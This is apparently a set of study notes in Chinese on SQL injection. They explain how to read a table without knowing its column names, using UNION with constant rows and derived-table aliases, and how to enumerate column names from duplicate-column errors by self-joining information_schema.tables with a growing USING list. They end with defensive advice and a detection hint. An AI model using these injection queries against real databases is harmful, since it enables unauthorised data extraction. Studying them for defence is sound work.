SQL 注入（利用 join 进行无列名注入）：在不知道目标表列名时，先用 union 把常量行放在前面，使结果集的列名变成 1、2、3，再通过派生表别名按这些列名取值。
-- Demo sequence: reading table `sc` without referring to its real column names.
-- Backtick quoting suggests MySQL/MariaDB -- TODO confirm target engine.
-- Assumes `sc` has exactly three columns, since the constant row 1,2,3 must
-- match its column count for the UNION to be accepted -- TODO confirm schema.

-- A UNION takes its output column names from the first SELECT, so the
-- combined result is labelled 1, 2, 3 instead of the names used by `sc`.
SELECT 1, 2, 3
UNION
SELECT * FROM sc;

-- Inside a derived table those positional labels become addressable.
-- The backticks matter: an unquoted 1 would be the numeric literal.
SELECT `1`
FROM (
    SELECT 1, 2, 3
    UNION
    SELECT * FROM sc
) AS a;

-- Same shape, second column.
SELECT `2`
FROM (
    SELECT 1, 2, 3
    UNION
    SELECT * FROM sc
) AS a;

-- Baseline read of the table, for comparison with the relabelled output.
SELECT * FROM sc;

-- The first two steps again (repeated in the original notes).
SELECT 1, 2, 3
UNION
SELECT * FROM sc;

SELECT `1`
FROM (
    SELECT 1, 2, 3
    UNION
    SELECT * FROM sc
) AS a;
利用 join 报错获取列名：同一张表自连接后，派生表中出现同名列，数据库会报重复列名错误，报错信息里带出列名。
-- Self-join of information_schema.tables with no USING/ON clause: derived
-- table `c` would carry every column name twice, so the statement is expected
-- to fail with a duplicate-column-name error rather than return rows.
-- The notes read a column name out of that error text; this only works when
-- raw database errors are returned to the client.
SELECT *
FROM sc
UNION ALL
SELECT *
FROM (
    SELECT *
    FROM information_schema.tables AS a
    JOIN information_schema.tables AS b
) AS c;
报错信息指出第一个重复的列，由此得到第一列列名 table_catalog。
-- Same self-join, now with USING (table_catalog): the named column is merged
-- into a single output column, so it no longer clashes and the duplicate-name
-- error is expected to move on to the next column.
-- Still an error-driven probe: nothing is learned if error text is not
-- exposed to the caller.
SELECT *
FROM sc
UNION ALL
SELECT *
FROM (
    SELECT *
    FROM information_schema.tables AS a
    JOIN information_schema.tables AS b
        USING (table_catalog)
) AS c;
用 using(table_catalog) 合并已知列后，报错指向下一个重复的列，由此得到第二列列名 table_schema。
-- Third step of the same pattern: both known columns are listed in USING, so
-- they are merged and the duplicate-name error is expected to report the
-- third column.
-- Detection hint: repeated failing statements that self-join one table and
-- grow the USING list by one column each time are characteristic of this probe.
SELECT *
FROM sc
UNION ALL
SELECT *
FROM (
    SELECT *
    FROM information_schema.tables AS a
    JOIN information_schema.tables AS b
        USING (table_catalog, table_schema)
) AS c;
可得第三列列名；之后每次把新得到的列名加入 using(...)，依次枚举其余列。该方法依赖数据库报错回显；防御上应使用参数化查询，并且不向客户端返回数据库原始错误信息。